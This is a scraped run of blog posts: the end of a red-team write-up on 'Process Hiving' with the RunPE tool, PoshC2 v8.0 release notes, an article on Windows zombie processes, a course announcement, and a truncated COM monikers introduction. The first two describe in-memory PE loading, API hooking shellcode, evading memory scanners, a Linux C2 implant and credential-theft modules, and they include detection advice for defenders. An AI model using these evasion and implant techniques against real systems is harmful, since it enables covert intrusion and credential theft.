0: 48 c7 c1 00 00 00 00 mov rcx, 0x0 // Move 0 into rcx for exit code argument
7: 48 b8 37 13 37 13 37 movabs rax, 0x1337133713371337 // Move address of ExitThread into rax
e: 13 37 13
11: 50 push rax // Push rax onto stack and ret, so this value with be the 'return address'
12: c3 ret

We can see this in x64dbg while RunPE is running, viewing the NtTerminateProcess function and noting it has been patched to exit the thread instead.

Fixing APIs

Several other API calls also required patching with new values in order for PEs to work. One example is GetModuleHandle which, if called with a NULL parameter, returns a handle to the base of the main module. When a PE calls this function it is expecting to receive its base address, however in this scenario the API call will in fact return the host process’ binary’s base address, which could cause the whole process to crash, depending on how that address is then used.

However, GetModuleHandle could also be called with a non-NULL value, in which case the base address of a different module will be returned.

GetModuleHandle is therefore hooked and execution jumps to a newly allocated area of memory that performs some simple logic; returning the base address of the mapped PE if the argument is NULL and rerouting back to the original GetModuleHandle function if not. As the first few bytes of GetModuleHandle get overwritten with a jump to our hook these instructions must be executed in the hook before jumping back to the GetModuleHandle function, return execution to after the hook jump.

As with the previous API patches, these bytes must be dynamically built-in order to provide the runtime addresses of the hook location, the GetModuleHandle function and the base address of the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 15.png

As an additional change the PEB is also updated, replacing the base address with that of the target PE so that if any programs retrieve this address from the PEB directly then they get the expected value.

At this point, the target PE should be in a position to be able to run from within the host process by calling the entry point of the PE directly. However, as the intended use case is to be able to use RunPE to execute PEs in memory from with an implant, it is a requirement to be able to capture output from the program.

Capturing Output

Output is captured from the target process by replacing the handles to STDOUT and STDERR with handles to anonymous pipes using SetStdHandle.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 18.png

Just before the target PE entry point is invoked on a new thread, an additional thread is first created that will read from these pipes until they are closed. In this way, the output is captured and can be returned from RunPE. The pipes are closed by RunPE after the target PE has finished executing, ensuring that all output is captured.

Clean Up

As Process Hiving includes running multiple processes from within one, long-running host process it is important that any execution of these ‘sub’ processes includes full and proper clean up. This serves two purposes:

  • To restore any changed state and functionality in order to ensure that the host process can continue to operate normally.
  • To remove any artefacts from memory that may cause an alert or artifact if detected through techniques such as in-memory scanning or aid an investigator in the event of a manual triage.

To achieve this, any code change made by RunPE is stored during execution and restored once execution is complete. This includes API hooks, changed values in memory, file descriptors, loaded modules and of course the mapped PE itself. In the case of any particularly sensitive values, such as the command line arguments and mapped PE, the memory region is first zeroed out before it is freed.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 20.png

Demonstration

An example of RunPE running unchanged and up-to-date Mimikatz is below, alongside Procmon process activity events for the process.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 21.png

Note that there are no sub-processes created, and Mimikatz runs successfully with the provided arguments.

Running a debug build provides more output and allows us to verify that the artefacts are being removed from memory and hooks removed, etc. We can see below that after the clean-up has occurred the ‘new’ DLLs loaded for Mimikatz have either already been cleaned up by Mimikatz itself (the error code 126) or are freed by RunPE and are now no longer visible in the Modules tab of Process Hacker.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 22.png

Similarly, the original code on the hooks such as NtTerminateProcess has been restored, which we can verify using a debugger such as x64dbg as below.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 23.png

As during Red Team operations Mimikatz.exe is unlikely to exist in the target environment, RunPE also supports loading of binaries from base64 blobs so that they can be passed with arguments down C2 channels. Long, triple dash switches are used in order to avoid conflicts with any arguments to the target PE.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 24.png

An example of this from a PoshC2 implant below demonstrates the original use case. The implant host process of netsh.exe loads and invokes the RunPE .NET assembly which in turn loads and runs net.exe in the host process with arguments. In this case net.exe is passed as a base64 blob down C2.

Z:\Downloads\Whitepaper\Export-e0735b6d-feef-40ce-bcc9-8ce00c5523bc\Process Hiving 64777627280b48d586409f800840b2d6\Untitled 25.png

Known Issues & Further Work

There are a number of known issues and caveats with this work in its current state which are detailed below.

  • RunPE only supports x64 bit native Windows PE files.
  • During testing any modern PE compiled by the testers has worked without issues, however issues remain with a number of older Windows binaries such as ipconfig.exe and icacls.exe. Further research is presently ongoing into what specific characteristics of these files cause issues.
  • If the target PE spawns sub-processes itself then those are not subject to Process Hiving and will be performed in the normal fashion. It is up to the operator to understand what the behaviour of the target PE is any other considerations that should be made.
  • RunPE presently calls the entry point of the target PE on a new thread and waits for that thread to finish, with a timeout. If the timeout is reached or if the target PE manipulates that thread, this is undefined behaviour.
  • PEs compiled without ASLR support do not work currently, such as by mingw.

Additionally, further work can be made on RunPE to improve the stealth of the Process Hiving technique:

  • Dependencies of the target PE can be mapped into memory using the same PE loader as the target PE itself and not using the standard Windows Loader. This would bypass detections on API calls such as LoadLibrary and GetProcAddress as well as any hooks placed in those modules by defensive software.
  • For any native API calls that remain, the use of syscalls directly can be explored to achieve the same ends for the same reasons as described above.

Detections

For Blue Team members, the best way to prevent this technique is to prevent the attacker from reaching this stage in the kill chain. Delivery and initial execution for example likely provide more options for detecting an attack than process self-manipulation. However, a number of the actions taken by RunPE can be explored as detections.

  • SetStdHandle is called six times per RunPE call, once to set STDOUT, STDERR and STDIN to handles to anonymous pipes and then again to reset them. A cursory monitor of a number and range of processes on the author’s own machine did not show any invocations of this API call as part of standard use, so this activity could potentially be used to detect RunPE.
  • A number of APIs are hooked or modified and then restored as part of every RunPE run such as GetCommandLine, NtTerminateProcess, CorExitProcess, RtlExitUserProcess, GetModuleHandle and TerminateProcess. Continued modification of these Windows API calls in memory is not likely to be common behaviour and a potential avenue to detection.
  • Similarly, the PEB is also continually modified as the command line string and image name are updated with every invocation of RunPE.
  • While the source code can be obfuscated, any attempt to load the default RunPE assembly into a .NET process provides a strong opportunity for detection.

Conclusion

At its core, Process Hiving is a fairly simple process. A PE is manually mapped into memory using existing techniques and a number of changes are made to API calls and the environment so that when the entry point of that PE is invoked it runs in the expected way.

We hope that this technique and the tool that implements it will allow Red Teams to be able to quickly and easily run native binaries from their implant processes without having to deal with many of the pain points that plague similar techniques that already exist.

The source code for RunPE is available at https://github.com/nettitude/RunPE and any further work on the tool can be found there. Contributions and collaboration are also welcome.

Process Hiving Cover 2

Download our whitepaper and tool

This blog is a condensed version of a whitepaper we’ve released, called “Process Hiving”.  It comes with a new tool too, “RunPE”.  You can download these at the links below.

Whitepaper

Our process hiving whitepaper can be downloaded here.

Tool

RunPE, our accompanying tool, can be downloaded from GitHub.

The post Introducing Process Hiving & RunPE appeared first on Nettitude Labs.

Introducing PoshC2 v8.0

We’re thrilled to announce a new release of PoshC2 packed full of new features, modules, major improvements, and bug fixes. This includes the introduction of a brand-new native Linux implant and the capability to execute Beacon Object Files (BOF) directly from PoshC2!

Download and Documentation

Please use the following links for download and documentation:

RunOF Capability

In this release, we have introduced Joel Snape’s (@jdsnape) excellent method to run Cobalt Strike Beacon Object Files (BOF) in .NET, and its integration in PoshC2. This feature has a blog post unto itself available, but essentially it allows existing BOFs to be run in any C# implant, including PoshC2.

Text Description automatically generated

At a high-level, here is how it works:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Clean-up memory artifacts before exiting

Read our recent blog post on this for more detail.

SharpSocks Improvements

SharpSocks provides HTTP tunnelled SOCKS proxying capability to PoshC2 and has been rewritten and modernised to improve stability and usability, in addition to having its integration with PoshC2 improved, so that it can be more clearly and easily configured and used.

Text Description automatically generated

RunPE Integration

Last year, Rob Bone (@m0rv4i) and Ben Turner (@benpturner) released a whitepaper on “Process Hiving” along with a new tool “RunPE”, the source code of which can be found here. We have integrated this technique within this release of PoshC2 for ease of use, and it can be executed as follows:

Text Description automatically generated

By default, new executables can be added to /opt/PoshC2/resources/modules/PEs so that PoshC2 knows where to find them when using the runpe and runpe-debug commands shown above.

DllSearcher

We’ve added the dllsearcher command which allows operators to search for specific module names loaded within the implant’s current process, for instance:

Graphical user interface, application Description automatically generated

GetDllBaseAddress, FreeMemory & RemoveDllBaseAddress

Three evasion related commands were added which can be used to hide the presence of malicious shellcode in memory. getdllbaseaddress is used to retrieve the implant shellcode’s current base address, for example:

Graphical user interface, text, application, chat or text message Description automatically generated

Looking at our process in Process Hacker, we can correlate this base address memory location:

Table Description automatically generated

By using the freememory command, we can then clear this address’ memory space:

Graphical user interface, application Description automatically generated

Table Description automatically generated

The removedllbaseaddress command is a combination of getdllbaseaddress and freememory, which can be used to expedite the above process by automatically finding and freeing the relevant implant shellcode’s memory space:

Graphical user interface, text, application Description automatically generated

Get-APICall & DisableEnvironmentExit

In this commit we implemented a means for operators to retrieve the memory location of specific function calls via get-apicall, for instance:

Graphical user interface, application Description automatically generated

In addition, we’ve included disableenvironmentexit which patches and prevents calls to Environment.Exit() within the current implant. This can be particularly useful when executing modules containing this call which may inadvertently kill our implant’s process.

C# Ping, IPConfig, and NSLookup Modules

Several new C# modules related to network operations were developed and added to this release, thanks to Leo Stavliotis (@lstavliotis). They can be run using the following new commands:

  • ping <ip/hostname >
  • nslookup <ip/hostname>
  • ipconfig

C# Telnet Client

A simple Telnet client module has been developed by Charley Celice (@kibercthulhu) and embedded in the C# implant handler to provide operators the ability to quickly validate Telnet access where needed. It will simply attempt to connect and run an optional command before exiting:

A picture containing graphical user interface Description automatically generated

We have plans to add additional modules such as this one to cover a wider range of services.

C# Registry Module

Another module by Charley Celice (@kibercthulhu) was added. SharpReg allows for common registry operations in Windows. At this stage it currently consists of simple functionalities to search, query, create/edit, delete and audit registry hives, keys, values and data. It can be executed as shown below:

Text Description automatically generated

We’re adding more features to this module which will include expediating certain registry-based persistence, privilege escalation, UAC bypass techniques, and beyond.

PoshGrep

PoshGrep can easily be used to parse task outputs. This can be particularly useful when searching for specific process information obtained from a large number of remote hosts. It can be used by piping your PoshC2 command into poshgrep, for example:

A screenshot of a computer Description automatically generated with medium confidence

The output task database retains the full output for tracking.

FindFile

findfile was added, which can be used to search for specific file names and types. In the example below, we search for any occurrences of the file name “password” within .txt files:

Graphical user interface Description automatically generated with medium confidence

Bringing PoshC2 to Linux

One of the major new features we have incorporated in this release of PoshC2 is our new Native Linux implant, thanks to the great work of Joel Snape (@jdsnape). While it’s fair to say that we spend most of our time on Windows, we find that having the capability to persist on Linux machines (usually servers) can be key to a successful engagement. We also know that many of the adversaries we simulate have developed tooling specifically for Linux. PoshC2 has always had a Python implant which will run on Linux assuming that Python is installed, but we decided that it was time that we advanced our capabilities to a native binary that is harder to detect and has fewer dependencies.

To that end, Posh v8.0 includes a native Linux implant that can run on any* x86/x64 Linux OS with a kernel >= 2.6 (it should work on earlier versions, but we’ve not tested that far back!). It also works on a few systems that aren’t Linux but have implemented enough of the syscall interface (most importantly ESXi hypervisors).

Usage

When payloads are created in PoshC2 you will notice a new “native_linux” payload being written on startup:

Payload

Payload

This is the stage one payload, and when executed will contact the C2 server and retrieve the second stage. The first stage is a statically linked stripped executable, around 1MB in size. The second stage is a statically linked shared library, that the first stage will load in memory using a custom ELF loader and execute (see below for more detail). The dropper has been designed to be as compatible as possible, and so should just work out of the box regardless of what userspace is present.

The aim of the implant is not to be “super-stealthy”, but to emulate a common Linux userspace Trojan. Therefore, the implant just needs to be executed directly; how you do this will obviously depend on the level of access you have to your target.

Once the second stage has been downloaded and executed the implant operates in much the same way as the existing Python implant, supporting many of the same commands, and they can be listed with the help command:

help

Help

Most notably, the implant allows you to execute other commands as child processes using /bin/sh, run Python modules (again, assuming a Python interpreter is present on your target), and run the linuxprivchecker script that is present in the Python implant.

Goal

To meet our needs, we set the following high-level goals:

  • Follow the existing pattern of a small stage one loader, with a second stage being downloaded from the C2 server.
  • A native executable, with as few dependencies as possible and that would run on as many different distributions as possible.
  • Compatibility with older distributions, particularly those with an older kernel.
  • As little written to disk as possible beyond the initial loader.
  • Run in user-space (i.e., not a kernel implant).

This gives us greater flexibility and stealth, and allows us to operate on machines that maybe don’t have Python installed or where a running Python process would be anomalous.

There are a few choices in language and architecture to build native executables. The “traditional” method is to use C or C++ which compiles to an ELF executable. More modern languages, like Golang, are also an option, and have notably been used by some threat groups to develop native tooling. For this project however we decided to stick with C as it lets us implement small and lean executables.

How it Works

The Linux implant comes in two parts, a dropper and a stage two which is downloaded from the C2.

Compilation of the native images can be a bit time consuming, so we have provided binary images in the PoshC2 distribution (you can see the source code here). This means that when a new implant is generated, PoshC2 needs a way to “inject” its configuration into the binary file. All configuration is contained in the dropper, except for a random key and URI which are patched over placeholder values in the stage two binary and is contained in an additional ELF section at the end of the binary. This is injected by PoshC2 using objcopy when a new implant is generated. You should note that at the moment there is no obfuscation or encryption of the configuration so it will be trivially readable with strings or similar.

When the dropper is launched it parses the configuration and connects to the C2 server to obtain the second stage using the configured hosts and URLs.

Loading the Second Stage

Our main aim with the execution of the second stage was to be able to run it without writing any artifacts to disk, and to have something that was easy to develop and compile. Given the above goals, it also needed to be as portable as possible.

The easiest way to do this would be to create a shared library and use the dlopen() and dlsym() functions to load it and find the address of a function to call. Historically, the dlopen() functions required a file to operate on, but as of kernel version 3.17 it is possible to use memfd_create to get a file descriptor for memory without requiring a writable mount point. However, there are two issues with that approach:

  • The musl standard library we are using (see below) doesn’t support dlopen as it doesn’t make sense in a context where everything is statically linked.
  • Ideally, we’d like to support kernels older than 3.17, as although it was released in 2014, we still come across older ones from time to time.

Given these constraints, we implemented our own shared library loader in the dropper. More details can be found in the project readme, but at a high level it’s this:

  • Parses the stage two ELF header, and allocates memory as appropriate.
  • Copies segments into memory as required.
  • Carries out any relocations required (as specified in the relocations section).
  • Finds the address of our library’s entry function (we define this as loopy() because it, well, loops…).
  • Calls the library function with a pointer to a configuration object and a table of function pointers to common functions the second stage needs.

If you want to understand this process in more detail there is an excellent set of articles by Eli Bendersky that go through the process for load time relocation and position independent code.

In theory, the second stage could be any statically linked library, but we’ve not extensively tested the loader. In the future, we’d like to re-use this loader capability to allow additional modules to be delivered to the implant so you can bring your own tooling as needed (for example, network scanning or proxying).

At this point the second stage is now operating and can communicate with the C2, run commands, etc.

Compatibility

One of the key aims for the Linux implant was to make it operate on as many different distributions/versions as possible without needing to have any prior knowledge of what was running before deployment – something that can be difficult to achieve with a single binary.

Normally Linux binaries are “dynamically linked”, which means that when the program is run the OS runtime-linker (usually something like /lib/ld-linux-x86-64.so.2) finds and loads the shared libraries that are needed.

For example, running ldd /bin/ssh, which shows the linked library dependencies, demonstrates that it depends on a range of different system libraries to do things like cryptographic operations, DNS resolutions, manage threads, etc. This is convenient because your binaries end up being smaller as code is reused, however it also means that your program will not run unless that the specific version of the library you linked against at compile time is present on the target system.

Obviously, we can’t always guarantee what will be present on the systems we are deploying on, so to work around this the implant is “statically linked”. This means that the executable contains its code and all of the libraries that it needs to operate in one file and has no dependencies on anything other than the operating system kernel.

The key component that needs to be linked is the “standard library” which is the set of functions that are used to carry out common tasks like string/memory manipulation, and most importantly interface between your application and the OS kernel using the system call API. The most common standard library is the GNU C library (glibc), and this is what you will usually find on most Linux distributions. However, it is fairly large and can be difficult to successfully statically link. For this reason, we decided to use the musl library, which is designed to be simple, efficient and used to produce statically linked executables (for example as on Alpine Linux).

Because the implant comes in two parts, if there are any common dependencies (e.g., we use libcurl to make HTTPS requests) then they would normally have to be statically linked into each binary. This would obviously be inefficient as the process would end up having two copies of the library in memory, one from the dropper and one from the stage two, and the stage two would be unnecessarily large. Therefore, for the larger libraries like libcurl a set of function pointers are provided from the dropper when it executes the stage two, so it can take advantage of the libraries that were already linked into the dropper.

The implant is built for x86 systems, as this means that it will run on both 32- and 64-bit operating systems. Other architectures (e.g., ARM) may follow.

Child Processes

Our implant would be pretty limited without the ability to execute other commands using the system shell. This is easily carried out using the popen() function call in the standard library which executes the given command and opens a pipe so the command’s output can be read. However, some commands (e.g. ping with default arguments) may not exit, and so our implant would “hang” reading the output forever. To get around this, we have written a custom popen() implementation that allows us to launch our subcommand in a custom process group and set an alarm using SIGALRM to kill it after a user-configurable timeout period. Any output written by the process is then read and returned to the C2. This does mean however that long running commands will be prematurely terminated.

Detection

We typically find that Linux environments have a lot less scrutiny applied than their Windows counterparts. Nevertheless, they are often hosting critical services and data and so monitoring for suspicious or unusual behaviour should be considered. Many security vendors are starting to release monitoring agents for Linux, and several open-source tools are available.

A full exploration of security monitoring for Linux is out of scope for this post, but some things that might be seen when using this implant are:

  • Anomalous logins (for example SSH access at unusual times, or from an unusual location).
  • Vulnerability exploitation (for example, alerts in NIDS).
  • wget or curl being used to download files for execution.
  • Program execution from an unusual location (e.g. from a temporary directory or user’s home directory).
  • Changes to user or system cron entries.

The dropper itself has very limited operational security so we expect static detection of the binary by antivirus or NIDS to be relatively straightforward in this publicly released version.

It’s also worth reviewing the PoshC2 indicators of compromise listed at https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise.

Full Changelog

Many other updates and fixes have been added in this version and merged to dev, some of which are briefly summarized below. For updates and tips check out @nettitude_labs, @benpturner, @m0rv4i and @b4ggio-su on Twitter.

  • Miscellaneous fixes and refactoring
  • Fixed MSTHA and RegSvr32 quickstart payloads
  • Several runas and Daisy.dll related fixes
  • Improved PoshC2 reports output and style
  • Enforced the consistent use of UTC throughout
  • FComm related fixes
  • Added Native Linux implant and related functionalities from Joel Snape (@jdsnape)
  • Added Get-APICall & DisableEnvironmentExit in Core
  • Updated to psycopg2-binary so it’s not compiled from source
  • Database related fixes
  • RunPE integration
  • Added GetDllBaseAddress, FreeMemory, and RemoveDllBaseAddress in Core
  • Added C# Ping module from Leo Stavliotis (@lstavliotis)
  • Fixed fpc script on PostgreSQL
  • Added PrivescCheck.ps1 module
  • Added C# IPConfig module from Leo Stavliotis (@lstavliotis)
  • Updated several external modules, including Seatbelt, StandIn, Mimikatz
  • Added EventLogSearcher & Ldap-Searcher
  • Added C# NSLookup module from Leo Stavliotis (@lstavliotis)
  • Added getprocess in Core
  • Added findfile, getinstallerinfo, regread, lsreg, and curl in Core
  • Added GetGPPPassword & GetGPPGroups modules
  • Added Get-IdleTime to Core
  • Added PoshGrep option for commands
  • Added SharpChromium
  • Added DllSearcher to Core
  • Updated Dynamic-Code for PBind
  • Added RunOF capability into Posh along with several compiled situational awareness OFs
  • Updated Daisy Comms
  • Added C# SQLQuery module from Leo Stavliotis (@lstavliotis)
  • Added ATPMiniDump
  • Added rmdir, mkdir, zip, unzip & ntdsutil to Core
  • Fix failover retries for C# & Updated SharpDPAPI
  • Updated domain check case sensitivity in dropper
  • Fixed dropper rotation break
  • Added WMIExec and SMBExec modules
  • Added dcsync alias for Mimikatz
  • Added AES256 hash for uploaded files
  • Added RegSave module
  • SharpShadowCopy integration
  • Fixed and updated cookie decrypter script
  • Updated OPSEC Upload
  • Added FileGrep module
  • Added NetShareEnum to Core
  • Added StickyNotesExtract
  • Added SharpShares module
  • Added SharpPrintNightmare module
  • Added in memory SharpHound option
  • Updated Tasks.py to save Seatbelt output
  • Added kill-remote-process to Core
  • Fixed jxa_handler not being imported
  • Updated posh-update script to accept -x to skip install
  • Added process name in implant view from Lefteris Panos (@Lefterispan)
  • Added SharpReg module from Charley Celice (@kibercthulhu)
  • Added SharpTelnet module from Charley Celice (@kibercthulhu)
  • kill-process with no arguments now terminates the implant’s current process following a warning prompt
  • Added hide-dead-implants command
  • Added ability to modify user agent when creating new payloads from Kirk Hayes (@l0gan54k)
  • Added get-acl command in Core

Download now

github GitHub: https://github.com/nettitude/PoshC2

The post Introducing PoshC2 v8.0 appeared first on Nettitude Labs.

Zombie Processes

14 May 2022 at 09:00

The term “Zombie Process” in Windows is not an official one, as far as I know. Regardless, I’ll define zombie process to be a process that has exited (for whatever reason), but at least one reference remains to the kernel process object (EPROCESS), so that the process object cannot be destroyed.

How can we recognize zombie processes? Is this even important? Let’s find out.

All kernel objects are reference counted. The reference count includes the handle count (the number of open handles to the object), and a “pointer count”, the number of kernel clients to the object that have incremented its reference count explicitly so the object is not destroyed prematurely if all handles to it are closed.

Process objects are managed within the kernel by the EPROCESS (undocumented) structure, that contains or points to everything about the process – its handle table, image name, access token, job (if any), threads, address space, etc. When a process is done executing, some aspects of the process get destroyed immediately. For example, all handles in its handle table are closed; its address space is destroyed. General properties of the process remain, however, some of which only have true meaning once a process dies, such as its exit code.

Process enumeration tools such as Task Manager or Process Explorer don’t show zombie processes, simply because the process enumeration APIs (EnumProcesses, Process32First/Process32Next, the native NtQuerySystemInformation, and WTSEnumerateProcesses) don’t return these – they only return processes that can still run code. The kernel debugger, on the other hand, shows all processes, zombie or not when you type something like !process 0 0. Identifying zombie processes is easy – their handle table and handle count is shown as zero. Here is one example:

kd> !process ffffc986a505a080 0
PROCESS ffffc986a505a080
    SessionId: 1  Cid: 1010    Peb: 37648ff000  ParentCid: 0588
    DirBase: 16484cd000  ObjectTable: 00000000  HandleCount:   0.
    Image: smartscreen.exe

Any kernel object referenced by the process object remains alive as well – such as a job (if the process is part of a job), and the process primary token (access token object). We can get more details about the process by passing the detail level “1” in the !process command:

lkd> !process ffffc986a505a080 1
PROCESS ffffc986a505a080
    SessionId: 1  Cid: 1010    Peb: 37648ff000  ParentCid: 0588
    DirBase: 16495cd000  ObjectTable: 00000000  HandleCount:   0.
    Image: smartscreen.exe
    VadRoot 0000000000000000 Vads 0 Clone 0 Private 16. Modified 7. Locked 0.
    DeviceMap ffffa2013f24aea0
    Token                             ffffa20147ded060
    ElapsedTime                       1 Day 15:11:50.174
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.015
    QuotaPoolUsage[PagedPool]         0
    QuotaPoolUsage[NonPagedPool]      0
    Working Set Sizes (now,min,max)  (17, 50, 345) (68KB, 200KB, 1380KB)
    PeakWorkingSetSize                2325
    VirtualSize                       0 Mb
    PeakVirtualSize                   2101341 Mb
    PageFaultCount                    2500
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      20
    Job                               ffffc98672eea060

Notice the address space does not exist anymore (VadRoot is zero). The VAD (Virtual Address Descriptors) is a data structure managed as a balanced binary search tree that describes the address space of a process – which parts are committed, which parts are reserved, etc. No address space exists anymore. Other details of the process are still there as they are direct members of the EPROCESS structure, such as the kernel and user time the process has used, its start and exit times (not shown in the debugger’s output above).

We can ask the debugger to show the reference count of any kernel object by using the generic !object command, to be followed by !trueref if there are handles open to the object:

lkd> !object ffffc986a505a080
Object: ffffc986a505a080  Type: (ffffc986478ce380) Process
    ObjectHeader: ffffc986a505a050 (new version)
    HandleCount: 1  PointerCount: 32768
lkd> !trueref ffffc986a505a080
ffffc986a505a080: HandleCount: 1 PointerCount: 32768 RealPointerCount: 1

Clearly, there is a single handle open to the process and that’s the only thing keeping it alive.

One other thing that remains is the unique process ID (shown as Cid in the above output). Process and thread IDs are generated by using a private handle table just for this purpose. This explains why process and thread IDs are always multiples of four, just like handles. In fact, the kernel treats PIDs and TIDs with the HANDLE type, rather with something like ULONG. Since there is a limit to the number of handles in a process (16711680, the reason is not described here), that’s also the limit for the number of process and threads that could exist on a system. This is a rather large number, so probably not an issue from a practical perspective, but zombie processes still keep their PIDs “taken”, so it cannot be reused. This means that in theory, some code can create millions of processes, terminate them all, but not close the handles it receives back, and eventually new processes could not be created anymore because PIDs (and TIDs) run out. I don’t know what would happen then 🙂

Here is a simple loop to do something like that by creating and destroying Notepad processes but keeping handles open:

WCHAR name[] = L"notepad";
STARTUPINFO si{ sizeof(si) };
PROCESS_INFORMATION pi;
int i = 0;
for (; i < 1000000; i++) {	// use 1 million as an example
	auto created = ::CreateProcess(nullptr, name, nullptr, nullptr,
        FALSE, 0, nullptr, nullptr, &si, &pi);
	if (!created)
		break;
	::TerminateProcess(pi.hProcess, 100);
	printf("Index: %6d PID: %u\n", i + 1, pi.dwProcessId);
	::CloseHandle(pi.hThread);
}
printf("Total: %d\n", i);

The code closes the handle to the first thread in the process, as keeping it alive would create “Zombie Threads”, much like zombie processes – threads that can no longer run any code, but still exist because at least one handle is keeping them alive.

How can we get a list of zombie processes on a system given that the “normal” tools for process enumeration don’t show them? One way of doing this is to enumerate all the process handles in the system, and check if the process pointed by that handle is truly alive by calling WaitForSingleObject on the handle (of course the handle must first be duplicated into our process so it’s valid to use) with a timeout of zero – we don’t want to wait really. If the result is WAIT_OBJECT_0, this means the process object is signaled, meaning it exited – it’s no longer capable of running any code. I have incorporated that into my Object Explorer (ObjExp.exe) tool. Here is the basic code to get details for zombie processes (the code for enumerating handles is not shown but is available in the source code):

m_Items.clear();
m_Items.reserve(128);
std::unordered_map<DWORD, size_t> processes;
for (auto const& h : ObjectManager::EnumHandles2(L"Process")) {
	auto hDup = ObjectManager::DupHandle(
        (HANDLE)(ULONG_PTR)h->HandleValue , h->ProcessId, 
        SYNCHRONIZE | PROCESS_QUERY_LIMITED_INFORMATION);
	if (hDup && WAIT_OBJECT_0 == ::WaitForSingleObject(hDup, 0)) {
		//
		// zombie process
		//
		auto pid = ::GetProcessId(hDup);
		if (pid) {
			auto it = processes.find(pid);
			ZombieProcess zp;
			auto& z = it == processes.end() ? zp : m_Items[it->second];
			z.Pid = pid;
			z.Handles.push_back({ h->HandleValue, h->ProcessId });
			WCHAR name[MAX_PATH];
			if (::GetProcessImageFileName(hDup, 
                name, _countof(name))) {
				z.FullPath = 
                    ProcessHelper::GetDosNameFromNtName(name);
				z.Name = wcsrchr(name, L'\\') + 1;
			}
			::GetProcessTimes(hDup, 
                (PFILETIME)&z.CreateTime, (PFILETIME)&z.ExitTime, 
                (PFILETIME)&z.KernelTime, (PFILETIME)&z.UserTime);
			::GetExitCodeProcess(hDup, &z.ExitCode);
			if (it == processes.end()) {
				m_Items.push_back(std::move(z));
				processes.insert({ pid, m_Items.size() - 1 });
			}
		}
	}
	if (hDup)
		::CloseHandle(hDup);
}

The data structure built for each process and stored in the m_Items vector is the following:

struct HandleEntry {
	ULONG Handle;
	DWORD Pid;
};
struct ZombieProcess {
	DWORD Pid;
	DWORD ExitCode{ 0 };
	std::wstring Name, FullPath;
	std::vector<HandleEntry> Handles;
	DWORD64 CreateTime, ExitTime, KernelTime, UserTime;
};

The ObjectManager::DupHandle function is not shown, but it basically calls DuplicateHandle for the process handle identified in some process. if that works, and the returned PID is non-zero, we can go do the work. Getting the process image name is done with GetProcessImageFileName – seems simple enough, but this function gets the NT name format of the executable (something like \Device\harddiskVolume3\Windows\System32\Notepad.exe), which is good enough if only the “short” final image name component is desired. if the full image path is needed in Win32 format (e.g. “c:\Windows\System32\notepad.exe”), it must be converted (ProcessHelper::GetDosNameFromNtName). You might be thinking that it would be far simpler to call QueryFullProcessImageName and get the Win32 name directly – but this does not work, and the function fails. Internally, the NtQueryInformationProcess native API is called with ProcessImageFileNameWin32 in the latter case, which fails if the process is a zombie one.

Running Object Explorer and selecting Zombie Processes from the System menu shows a list of all zombie processes (you should run it elevated for best results):

Object Explorer showing zombie processes

The above screenshot shows that many of the zombie processes are kept alive by GameManagerService.exe. This executable is from Razer running on my system. It definitely has a bug that keeps process handle alive way longer than needed. I’m not sure it would ever close these handles. Terminating this process will resolve the issue as the kernel closes all handles in a process handle table once the process terminates. This will allow all those processes that are held by that single handle to be freed from memory.

I plan to add Zombie Threads to Object Explorer – I wonder how many threads are being kept “alive” without good reason.

image

zodiacon

Next Windows Kernel Programming Class

14 July 2022 at 12:13

I’m happy to announce the next 5-day virtual Windows Kernel Programming class to be held in October. The syllabus for the class can be found here. A notable addition to the class is an introduction to the Kernel Mode Driver Framework (KMDF).

Dates and Times (all in October 2022), times based on London:
11 (full day): 4pm to 12am
12 (full day): 4pm to 12am
13 (half day): 4pm to 8pm
17 (half day): 4pm to 8pm
18 (full day): 4pm to 12am
19 (half day): 4pm to 8pm
20 (half day): 4pm to 8pm

The class will be recorded and provided to the participants.

Cost:
900 USD if paid by an individual
1700 USD if paid by a company
Previous participants of my classes get 10% off. Multiple participants from the same company get a discount as well (talk to me).

Registration
To register, send email to [email protected] and provide the name(s) and email(s) of the participant(s), the company name (if any), and your time zone (for my information, although I cannot change course times).

Feel free to contact me for any questions or comments via email, twitter (@zodiacon) or Linkedin.

Introduction to Monikers

17 September 2022 at 22:02

The foundations of the Component Object Model (COM) are made of two principles:

  1. Clients program against interfaces, never concrete classes.
  2. Location transparency – clients need not know where the actual object is (in-process, out-of-process, another machine).

Although simple in principle, there are many details involved in COM, as those with COM experience are well aware. In this post, I’d like to introduce one extensibility aspect of COM called Monikers.

The idea of a moniker is to provide some way to identify and locate specific objects based on string names instead of some custom mechanism. Windows provides some implementations of monikers, most of which are related to Object Linking and Embedding (OLE), most notably used in Microsoft Office applications. For example, when an Excel chart is embedded in a Word document as a link, an Item moniker is used to point to that specific chart using a string with a specific format understood by the moniker mechanism and the specific monikers involved. This also suggests that monikers can be combined, which is indeed the case. For example, a cell in some Excel document can be located by going to a specific sheet, then a specific range, then a specific cell – each one could be pointed to by a moniker, that when chained together can locate the required object.

Let’s start with perhaps the simplest example of an existing moniker implementation – the Class moniker. This moniker can be used to replace a creation operation. Here is an example that creates a COM object using the “standard” mechanism of calling CoCreateInstance:

#include <shlobjidl.h>
//...
CComPtr<IShellWindows> spShell;
